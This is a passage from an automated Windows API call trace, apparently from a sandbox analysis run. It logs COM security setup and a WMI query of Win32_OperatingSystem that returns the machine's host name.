pServerPrincName=0x189f24, pAuthnLevel=0x189f28, pImpLevel=0x189f18, pAuthInfo=0x189f1c, pCapabilites=0x189f20 | out: pAuthnSvc=0x189f30*=0xa, pAuthzSvc=0x189f2c*=0x0, pServerPrincName=0x189f24, pAuthnLevel=0x189f28*=0x6, pImpLevel=0x189f18*=0x2, pAuthInfo=0x189f1c, pCapabilites=0x189f20*=0x1) returned 0x0 [0131.182] WbemLocator:IUnknown:Release (This=0x4b2cb7c) returned 0x1 [0131.182] WbemLocator:IUnknown:QueryInterface (in: This=0x593d204, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ed4 | out: ppvObject=0x189ed4*=0x4b2cb9c) returned 0x0 [0131.182] WbemLocator:IUnknown:QueryInterface (in: This=0x593d204, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ed0 | out: ppvObject=0x189ed0*=0x4b2cb7c) returned 0x0 [0131.182] WbemLocator:IClientSecurity:SetBlanket (This=0x4b2cb7c, pProxy=0x593d204, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0131.182] WbemLocator:IUnknown:Release (This=0x4b2cb7c) returned 0x2 [0131.182] WbemLocator:IUnknown:Release (This=0x4b2cb9c) returned 0x1 [0131.182] CoTaskMemFree (pv=0x4bf9960) [0131.182] WbemLocator:IUnknown:Release (This=0x5930a10) returned 0x0 [0131.182] WbemLocator:IUnknown:QueryInterface (in: This=0x593d204, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ad0 | out: ppvObject=0x189ad0*=0x4b2cb9c) returned 0x0 [0131.182] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2cb9c, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189a8c | out: ppvObject=0x189a8c*=0x0) returned 0x80004002 [0131.183] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2cb9c, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898ac | out: ppvObject=0x1898ac*=0x0) returned 0x80004002 [0131.183] WbemLocator:IUnknown:AddRef (This=0x4b2cb9c) returned 0x3 [0131.183] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2cb9c, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1893ec | out: ppvObject=0x1893ec*=0x0) returned 0x80004002 [0131.183] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2cb9c, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18939c | out: ppvObject=0x18939c*=0x0) returned 0x80004002 [0131.184] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2cb9c, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893a8 | out: ppvObject=0x1893a8*=0x4b2cafc) returned 0x0 [0131.184] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b2cafc, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1893b0 | out: pCid=0x1893b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0131.184] WbemLocator:IUnknown:Release (This=0x4b2cafc) returned 0x3 [0131.184] CoGetContextToken (in: pToken=0x189408 | out: pToken=0x189408) returned 0x0 [0131.184] CoGetContextToken (in: pToken=0x189810 | out: pToken=0x189810) returned 0x0 [0131.184] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2cb9c, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898a0 | out: ppvObject=0x1898a0*=0x4b2cb84) returned 0x0 [0131.184] WbemLocator:IRpcOptions:Query (in: This=0x4b2cb84, pPrx=0x4b2cb9c, dwProperty=2, pdwValue=0x1898c8 | out: pdwValue=0x1898c8) returned 0x80004002 [0131.184] WbemLocator:IUnknown:Release (This=0x4b2cb84) returned 0x3 [0131.184] WbemLocator:IUnknown:Release (This=0x4b2cb9c) returned 0x2 [0131.184] CoGetContextToken (in: pToken=0x189de0 | out: pToken=0x189de0) returned 0x0 [0131.184] CoGetContextToken (in: pToken=0x189d40 | out: pToken=0x189d40) returned 0x0 [0131.184] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2cb9c, riid=0x189e10*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x189e0c | out: ppvObject=0x189e0c*=0x593d204) returned 0x0 [0131.184] WbemLocator:IUnknown:AddRef (This=0x593d204) returned 0x4 [0131.184] WbemLocator:IUnknown:Release (This=0x593d204) returned 0x3 [0131.185] WbemLocator:IUnknown:Release (This=0x593d204) returned 0x2 [0131.186] SysStringLen (param_1=0x0) returned 0x0 [0131.187] CoGetContextToken (in: pToken=0x189dd8 | out: pToken=0x189dd8) returned 0x0 [0131.187] WbemLocator:IUnknown:AddRef (This=0x4b2cb9c) returned 0x3 [0131.187] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2cb9c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189c6c | out: ppvObject=0x189c6c*=0x4b2cb9c) returned 0x0 [0131.187] WbemLocator:IUnknown:Release (This=0x4b2cb9c) returned 0x3 [0131.187] WbemLocator:IUnknown:Release (This=0x4b2cb9c) returned 0x2 [0131.187] CoGetContextToken (in: pToken=0x189ec8 | out: pToken=0x189ec8) returned 0x0 [0131.187] WbemLocator:IUnknown:AddRef (This=0x593d204) returned 0x3 [0131.187] IWbemServices:ExecQuery (in: This=0x593d204, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x18a0e0 | out: ppEnum=0x18a0e0*=0x593c934) returned 0x0 [0131.205] IUnknown:QueryInterface (in: This=0x593c934, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f38 | out: ppvObject=0x189f38*=0x593c938) returned 0x0 [0131.205] IClientSecurity:QueryBlanket (in: This=0x593c938, pProxy=0x593c934, pAuthnSvc=0x189f88, pAuthzSvc=0x189f84, pServerPrincName=0x189f7c, pAuthnLevel=0x189f80, pImpLevel=0x189f70, pAuthInfo=0x189f74, pCapabilites=0x189f78 | out: pAuthnSvc=0x189f88*=0xa, pAuthzSvc=0x189f84*=0x0, pServerPrincName=0x189f7c, pAuthnLevel=0x189f80*=0x6, pImpLevel=0x189f70*=0x2, pAuthInfo=0x189f74, pCapabilites=0x189f78*=0x1) returned 0x0 [0131.205] IUnknown:Release (This=0x593c938) returned 0x1 [0131.205] IUnknown:QueryInterface (in: This=0x593c934, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f2c | out: ppvObject=0x189f2c*=0x4b2b5bc) returned 0x0 [0131.205] IUnknown:QueryInterface (in: This=0x593c934, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f28 | out: ppvObject=0x189f28*=0x593c938) returned 0x0 [0131.205] IClientSecurity:SetBlanket (This=0x593c938, pProxy=0x593c934, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0131.209] IUnknown:Release (This=0x593c938) returned 0x2 [0131.209] WbemLocator:IUnknown:Release (This=0x4b2b5bc) returned 0x1 [0131.209] CoTaskMemFree (pv=0x4bf9990) [0131.209] IUnknown:QueryInterface (in: This=0x593c934, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b24 | out: ppvObject=0x189b24*=0x4b2b5bc) returned 0x0 [0131.209] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2b5bc, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189ae0 | out: ppvObject=0x189ae0*=0x0) returned 0x80004002 [0131.210] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2b5bc, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898fc | out: ppvObject=0x1898fc*=0x0) returned 0x80004002 [0131.210] WbemLocator:IUnknown:AddRef (This=0x4b2b5bc) returned 0x3 [0131.210] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2b5bc, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18943c | out: ppvObject=0x18943c*=0x0) returned 0x80004002 [0131.210] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2b5bc, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893ec | out: ppvObject=0x1893ec*=0x0) returned 0x80004002 [0131.211] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2b5bc, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893f8 | out: ppvObject=0x1893f8*=0x4b2b51c) returned 0x0 [0131.211] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b2b51c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189400 | out: pCid=0x189400*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0131.211] WbemLocator:IUnknown:Release (This=0x4b2b51c) returned 0x3 [0131.211] CoGetContextToken (in: pToken=0x189458 | out: pToken=0x189458) returned 0x0 [0131.211] CoGetContextToken (in: pToken=0x189860 | out: pToken=0x189860) returned 0x0 [0131.211] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2b5bc, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898f0 | out: ppvObject=0x1898f0*=0x4b2b5a4) returned 0x0 [0131.211] WbemLocator:IRpcOptions:Query (in: This=0x4b2b5a4, pPrx=0x4b2b5bc, dwProperty=2, pdwValue=0x189918 | out: pdwValue=0x189918) returned 0x80004002 [0131.211] WbemLocator:IUnknown:Release (This=0x4b2b5a4) returned 0x3 [0131.211] WbemLocator:IUnknown:Release (This=0x4b2b5bc) returned 0x2 [0131.211] CoGetContextToken (in: pToken=0x189e38 | out: pToken=0x189e38) returned 0x0 [0131.211] CoGetContextToken (in: pToken=0x189d98 | out: pToken=0x189d98) returned 0x0 [0131.211] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2b5bc, riid=0x189e68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189e64 | out: ppvObject=0x189e64*=0x593c934) returned 0x0 [0131.211] IUnknown:AddRef (This=0x593c934) returned 0x4 [0131.211] IUnknown:Release (This=0x593c934) returned 0x3 [0131.211] IUnknown:Release (This=0x593c934) returned 0x2 [0131.211] WbemLocator:IUnknown:Release (This=0x593d204) returned 0x2 [0131.211] SysStringLen (param_1=0x0) returned 0x0 [0131.211] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a12c | out: puCount=0x18a12c*=0x2) returned 0x0 [0131.212] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a128*=0x0, pszText=0x0 | out: puBuffLength=0x18a128*=0xf, pszText=0x0) returned 0x0 [0131.212] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a128*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a128*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0131.212] CoGetContextToken (in: pToken=0x189f80 | out: pToken=0x189f80) returned 0x0 [0131.212] IUnknown:AddRef (This=0x593c934) returned 0x3 [0131.212] IEnumWbemClassObject:Clone (in: This=0x593c934, ppEnum=0x18a13c | out: ppEnum=0x18a13c*=0x593d2a4) returned 0x0 [0131.213] IUnknown:QueryInterface (in: This=0x593d2a4, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a000 | out: ppvObject=0x18a000*=0x593d2a8) returned 0x0 [0131.213] IClientSecurity:QueryBlanket (in: This=0x593d2a8, pProxy=0x593d2a4, pAuthnSvc=0x18a050, pAuthzSvc=0x18a04c, pServerPrincName=0x18a044, pAuthnLevel=0x18a048, pImpLevel=0x18a038, pAuthInfo=0x18a03c, pCapabilites=0x18a040 | out: pAuthnSvc=0x18a050*=0xa, pAuthzSvc=0x18a04c*=0x0, pServerPrincName=0x18a044, pAuthnLevel=0x18a048*=0x6, pImpLevel=0x18a038*=0x2, pAuthInfo=0x18a03c, pCapabilites=0x18a040*=0x1) returned 0x0 [0131.213] IUnknown:Release (This=0x593d2a8) returned 0x1 [0131.213] IUnknown:QueryInterface (in: This=0x593d2a4, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ff4 | out: ppvObject=0x189ff4*=0x4b2fdbc) returned 0x0 [0131.213] IUnknown:QueryInterface (in: This=0x593d2a4, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ff0 | out: ppvObject=0x189ff0*=0x593d2a8) returned 0x0 [0131.213] IClientSecurity:SetBlanket (This=0x593d2a8, pProxy=0x593d2a4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0131.215] IUnknown:Release (This=0x593d2a8) returned 0x2 [0131.215] WbemLocator:IUnknown:Release (This=0x4b2fdbc) returned 0x1 [0131.215] CoTaskMemFree (pv=0x4bf9930) [0131.216] IUnknown:QueryInterface (in: This=0x593d2a4, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189bdc | out: ppvObject=0x189bdc*=0x4b2fdbc) returned 0x0 [0131.216] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2fdbc, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b98 | out: ppvObject=0x189b98*=0x0) returned 0x80004002 [0131.216] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2fdbc, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1899b4 | out: ppvObject=0x1899b4*=0x0) returned 0x80004002 [0131.216] WbemLocator:IUnknown:AddRef (This=0x4b2fdbc) returned 0x3 [0131.216] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2fdbc, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1894f4 | out: ppvObject=0x1894f4*=0x0) returned 0x80004002 [0131.217] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2fdbc, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1894a4 | out: ppvObject=0x1894a4*=0x0) returned 0x80004002 [0131.217] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2fdbc, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894b0 | out: ppvObject=0x1894b0*=0x4b2fd1c) returned 0x0 [0131.217] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b2fd1c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1894b8 | out: pCid=0x1894b8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0131.217] WbemLocator:IUnknown:Release (This=0x4b2fd1c) returned 0x3 [0131.217] CoGetContextToken (in: pToken=0x189510 | out: pToken=0x189510) returned 0x0 [0131.217] CoGetContextToken (in: pToken=0x189918 | out: pToken=0x189918) returned 0x0 [0131.217] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2fdbc, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1899a8 | out: ppvObject=0x1899a8*=0x4b2fda4) returned 0x0 [0131.217] WbemLocator:IRpcOptions:Query (in: This=0x4b2fda4, pPrx=0x4b2fdbc, dwProperty=2, pdwValue=0x1899d0 | out: pdwValue=0x1899d0) returned 0x80004002 [0131.217] WbemLocator:IUnknown:Release (This=0x4b2fda4) returned 0x3 [0131.217] WbemLocator:IUnknown:Release (This=0x4b2fdbc) returned 0x2 [0131.218] CoGetContextToken (in: pToken=0x189ef0 | out: pToken=0x189ef0) returned 0x0 [0131.218] CoGetContextToken (in: pToken=0x189e50 | out: pToken=0x189e50) returned 0x0 [0131.218] WbemLocator:IUnknown:QueryInterface (in: This=0x4b2fdbc, riid=0x189f20*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189f1c | out: ppvObject=0x189f1c*=0x593d2a4) returned 0x0 [0131.218] IUnknown:AddRef (This=0x593d2a4) returned 0x4 [0131.218] IUnknown:Release (This=0x593d2a4) returned 0x3 [0131.218] IUnknown:Release (This=0x593d2a4) returned 0x2 [0131.218] IUnknown:Release (This=0x593c934) returned 0x2 [0131.218] SysStringLen (param_1=0x0) returned 0x0 [0131.218] IEnumWbemClassObject:Reset (This=0x593d2a4) returned 0x0 [0131.223] CoTaskMemAlloc (cb=0x4) returned 0x4b294c0 [0131.225] IEnumWbemClassObject:Next (in: This=0x593d2a4, lTimeout=-1, uCount=0x1, apObjects=0x4b294c0, puReturned=0x26cb7f8 | out: apObjects=0x4b294c0*=0x593d2e0, puReturned=0x26cb7f8*=0x1) returned 0x0 [0131.255] IUnknown:QueryInterface (in: This=0x593d2e0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189798 | out: ppvObject=0x189798*=0x593d2e0) returned 0x0 [0131.255] IUnknown:QueryInterface (in: This=0x593d2e0, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189754 | out: ppvObject=0x189754*=0x0) returned 0x80004002 [0131.256] IUnknown:QueryInterface (in: This=0x593d2e0, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189574 | out: ppvObject=0x189574*=0x0) returned 0x80004002 [0131.256] IUnknown:AddRef (This=0x593d2e0) returned 0x3 [0131.256] IUnknown:QueryInterface (in: This=0x593d2e0, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1890b4 | out: ppvObject=0x1890b4*=0x0) returned 0x80004002 [0131.256] IUnknown:QueryInterface (in: This=0x593d2e0, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189064 | out: ppvObject=0x189064*=0x0) returned 0x80004002 [0131.256] IUnknown:QueryInterface (in: This=0x593d2e0, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189070 | out: ppvObject=0x189070*=0x593d2e4) returned 0x0 [0131.257] IMarshal:GetUnmarshalClass (in: This=0x593d2e4, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189078 | out: pCid=0x189078*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0131.257] IUnknown:Release (This=0x593d2e4) returned 0x3 [0131.257] CoGetContextToken (in: pToken=0x1890d0 | out: pToken=0x1890d0) returned 0x0 [0131.257] CoGetContextToken (in: pToken=0x1894d8 | out: pToken=0x1894d8) returned 0x0 [0131.257] IUnknown:QueryInterface (in: This=0x593d2e0, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189568 | out: ppvObject=0x189568*=0x0) returned 0x80004002 [0131.257] IUnknown:Release (This=0x593d2e0) returned 0x2 [0131.257] CoGetContextToken (in: pToken=0x189aa8 | out: pToken=0x189aa8) returned 0x0 [0131.257] CoGetContextToken (in: pToken=0x189a08 | out: pToken=0x189a08) returned 0x0 [0131.257] IUnknown:QueryInterface (in: This=0x593d2e0, riid=0x189ad8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189ad4 | out: ppvObject=0x189ad4*=0x593d2e0) returned 0x0 [0131.257] IUnknown:AddRef (This=0x593d2e0) returned 0x4 [0131.257] IUnknown:Release (This=0x593d2e0) returned 0x3 [0131.257] IUnknown:Release (This=0x593d2e0) returned 0x2 [0131.257] CoTaskMemFree (pv=0x4b294c0) [0131.257] CoGetContextToken (in: pToken=0x189e18 | out: pToken=0x189e18) returned 0x0 [0131.257] IUnknown:AddRef (This=0x593d2e0) returned 0x3 [0131.266] IWbemClassObject:Get (in: This=0x593d2e0, wszName="__GENUS", lFlags=0, pVal=0x18a128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a1a8*=0, plFlavor=0x18a1a4*=0 | out: pVal=0x18a128*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x18a1a8*=3, plFlavor=0x18a1a4*=64) returned 0x0 [0131.266] IWbemClassObject:Get (in: This=0x593d2e0, wszName="__PATH", lFlags=0, pVal=0x18a10c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a190*=0, plFlavor=0x18a18c*=0 | out: pVal=0x18a10c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\YKYD69Q\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"YKYD69Q\"", varVal2=0x0), pType=0x18a190*=8, plFlavor=0x18a18c*=64) returned 0x0 [0131.266] SysStringByteLen (bstr="\\\\YKYD69Q\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"YKYD69Q\"") returned 0x76 [0131.266] SysStringByteLen (bstr="\\\\YKYD69Q\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"YKYD69Q\"") returned 0x76 [0131.266] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a138 | out: ppv=0x18a138*=0x75849c) returned 0x0 [0131.267] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x18a130 | out: pAptType=0x18a130*=1) returned 0x0 [0131.267] IUnknown:QueryInterface (in: This=0x75849c, 